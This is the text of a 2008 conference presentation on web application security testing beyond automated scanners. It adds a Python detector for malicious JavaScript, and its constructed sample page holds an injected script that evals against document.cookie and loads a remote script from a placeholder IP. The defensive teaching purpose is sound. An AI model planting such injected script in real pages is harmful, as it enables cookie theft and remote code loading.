Explore the limitations of today's web scanners and see where manual web testing takes over.
Web Application Security Assessments: Beyond the Automated Scanners
Presented by: Blake Turrentine, [email protected]
Date: August 25, 2008
Locale: DHS Conference and Workshops, Baltimore, MD
AUGUST 2008 2
Scanning Web 1.0 Technology
Scanning Today’s Web 2.0 Technology
Mashups and Web Widgets
Beyond the Browser: Desktop Widgets
The Security Process: Threat Modeling
- STRIDE
- CIGITAL
- CLASP
- FISMA/NIST
Types of Testing Techniques
- Black Box
- White Box
- Grey Box
Types of Automated Scanners
- Static Code Analysis
- Vulnerability
- Web Application Specific
- Fuzzers
- Web Application Firewalls
Today's Automated Scanners
- Static code analysis: Fortify Source Code Analyzer
- Vulnerability scanners: Qualys, Nessus, Saint, Foundscan
- Web application specific: WebInspect, Cenzic, Appscan, Nikto
- Fuzzers: Mu4000, Codenomicon, Peach, Spike
- Web application firewalls: Imperva, Fortify, Mod-Security
Problems with Automated Scans
- Putting too much faith in automated scanners
- Their limitations: intuitiveness
- Low-hanging fruit
- False positives and false negatives
- 508 Compliance / CAPTCHA
- Out-maneuvering IPS and WAFs
- Dangers of injecting code in production environments
More Problems with Automated Scans
- Spidering
- Complex business logic
- Complex session handling
- Semantics
- Detecting sensitive data
- Asynchronous dynamic code execution
- Horizontal and vertical escalation
- Mashups, Ajax bridges, widgets, RSS feeds
- Emerging technologies such as AIR and Silverlight
Approaching a Better Solution: Taking a Closer Look
- Validation of automated scanners
- Application profiling
- Examining known attack vectors
- Looking for compromise
- Fuzzing
Application Profiling
- Application fingerprinting
- COTS
- The mindset of application developers:
  - Server-side code developer
  - Client-side code developer
  - System Administrator (SA)
  - Database Administrator (DBA)
Examining Known Vectors
- Catalog the application, then vulnerability detection
- The checklist
Client Side: Why Scanners Have Difficulties Handling Advanced JavaScript
- Obfuscation
- Lazy-loading
- Compromise
- Browser/server security tradeoffs
Client Side: Why Scanners Can't Handle Applets
- Decompiling bytecode (it is not HTML)
- Complex session management
Server Side: Input/Output of Content Is Getting More Complex
- Upload/download of files
- Effective screening of content/control
- Open boundary conditions
- Embedded objects, ActionScript, plug-ins, ActiveX
- Who is responsible for the content supplied?
- Blacklists, whitelists, regex, selective lists
Server Side: Scanners' Lack of Filter Enumeration and Evasion
- Response analysis
- Blacklisting
- Encoding tactics
- Problems in dealing with Rich Internet Apps (Flash, RSS, widgets)
- Whitelisting drawbacks: bypassing regex
- Employ input and output validation with both whitelists and blacklists
- Good input validation, poor output validation
Complexity of Analysis in Web Services
- XML parsing, manipulation, appending files, lack of tools
- AJAX: extended footprint (traditional Web application with Web services)
Difficulties in Testing Application Logic
- Inter-protocol exploitation and communication
- Forced directory browsing: access control
- Backend Web services
- API reverse engineering
- Authorization, session management, horizontal and vertical escalation, AJAX
Sophistication in Combining Attack Vectors
- XSS, SQL, command and HTML injection
- SMTP
- Browser types, versions and plug-ins, ActiveX
- Server configurations
- Interpretation of error handling (database errors, stack traces)
- Encoding tactics
- Attacking the admin
- Multilayer, 2nd-order attacks, edge cases
Most Scanners Don't Look for Infestation
- Parsing the database
- Script calls
- Embedded AJAX
- RSS
- Flash
- CSRF
- ActiveX calls
- Outbound calls
- Botnets
- Mastering the DOM: polymorphic JavaScript
Infestation Detection / Firewall
- Looking for hooking events: onload and onfocus, eval()
- Looking for user events such as onmouseover
- Making HTTP connections offsite
- onkey events
- Asynchronous stream injections with dynamic script execution
- The JavaScript interpreter (Caffeine Monkey, SpiderMonkey): obfuscation, whitespacing
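As an added example (not code from the presentation), a first-pass static scan for the infestation indicators listed above: hooking and user events, eval(), dynamic script insertion and HTTP connections to offsite hosts, with whitespace collapsed so padding around eval( does not hide it. The sample page fragment, the host name mail.example.com and the address 198.51.100.7 are constructed; a fuller check would also execute the script in an interpreter such as SpiderMonkey, as the slide notes.

```python
import re
from urllib.parse import urlparse

# Constructed sample page fragment (not from the presentation): an injected,
# whitespace-padded script plus event hooks and calls to an offsite host.
SAMPLE_HTML = """<html><body onload="init()">
<input name="q" onfocus="track(this)" onkeyup="k(event)">
<a href="#" onmouseover="window.open('http://198.51.100.7/c')">x</a>
<script>
  var p = "al" + "ert";  eval   (p + "(document.cookie)");
  var s = document.createElement('script');
  s.src = "http://198.51.100.7/inject.js"; document.body.appendChild(s);
  var x = new XMLHttpRequest(); x.open("GET", "/api/items");
</script></body></html>"""

# Indicators from the slide: hooking/user events, eval(), dynamic script execution, offsite HTTP.
EVENT_HOOKS = ("onload", "onfocus", "onmouseover", "onkeyup", "onkeydown", "onkeypress", "onerror")
URL_RE = re.compile(r"""https?://[^\s"'<>)]+""", re.IGNORECASE)
EVAL_RE = re.compile(r"\b(?:eval|setTimeout|setInterval|Function)\s*\(")
DYNSCRIPT_RE = re.compile(r"""createElement\s*\(\s*['"]script['"]\s*\)|document\.write\s*\(""")

def normalize(src: str) -> str:
    """Collapse whitespace so padding such as 'eval   (' still matches."""
    return re.sub(r"\s+", " ", src)

def scan_for_infestation(html: str, site_host: str) -> dict:
    """Count indicator hits; flag hooked events combined with eval/dynamic script or offsite calls."""
    text = normalize(html)
    hooks = {}
    for ev in EVENT_HOOKS:
        n = len(re.findall(rf"\b{ev}\s*=", text, re.IGNORECASE))
        if n:
            hooks[ev] = n
    offsite = set()
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        if host and host.lower() != site_host.lower():
            offsite.add(host)
    evals = len(EVAL_RE.findall(text))
    dyn = len(DYNSCRIPT_RE.findall(text))
    return {
        "event_hooks": hooks,
        "dynamic_eval": evals,
        "dynamic_script": dyn,
        "offsite_hosts": sorted(offsite),
        "suspicious": bool(hooks) and (evals + dyn > 0 or bool(offsite)),
    }

if __name__ == "__main__":
    print(scan_for_infestation(SAMPLE_HTML, "mail.example.com"))
```

Regex matching of this kind is only a triage step: polymorphic JavaScript that builds its calls at run time will evade it, which is why the slide points to running the code in an interpreter.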
Difficulties in Fuzzing Analysis
- Pros and cons
- File fuzzing
- Fuzzing APIs
- HTTP server response codes
- Code paths
Closing Remarks
- The machine and the human element
- Machine to machine
- Code maintenance
- Preventing your app from becoming part of a botnet
- SDLC process
- Regression testing
- Dealing with 0-day attacks
Demonstration: Bypassing Defense in Depth
Webmail Application Test: Combining Server & Client Attack Vectors
Webmail Application Test: IE Recognizes File as HTML
Webmail Application Test: Session Cookie is Displayed
GMail Web Application Test: Screenshot of Attached file
GMail Web Application Test: IE Recognizes File as HTML
GMail Web Application Test: JavaScript Fires
Yahoo Mail Web Application Test: Creating an Email
Yahoo Mail Web Application Test: Contents of 'Instructions.doc'
Yahoo Mail Web Application Test: Screenshot of Attached File
Yahoo Mail Web Application Test: Norton AV Scans File Before Download
Yahoo Mail Web Application Test: JavaScript Fires
Yahoo Mail Web Application Test: Redirection to Another Site
Questions?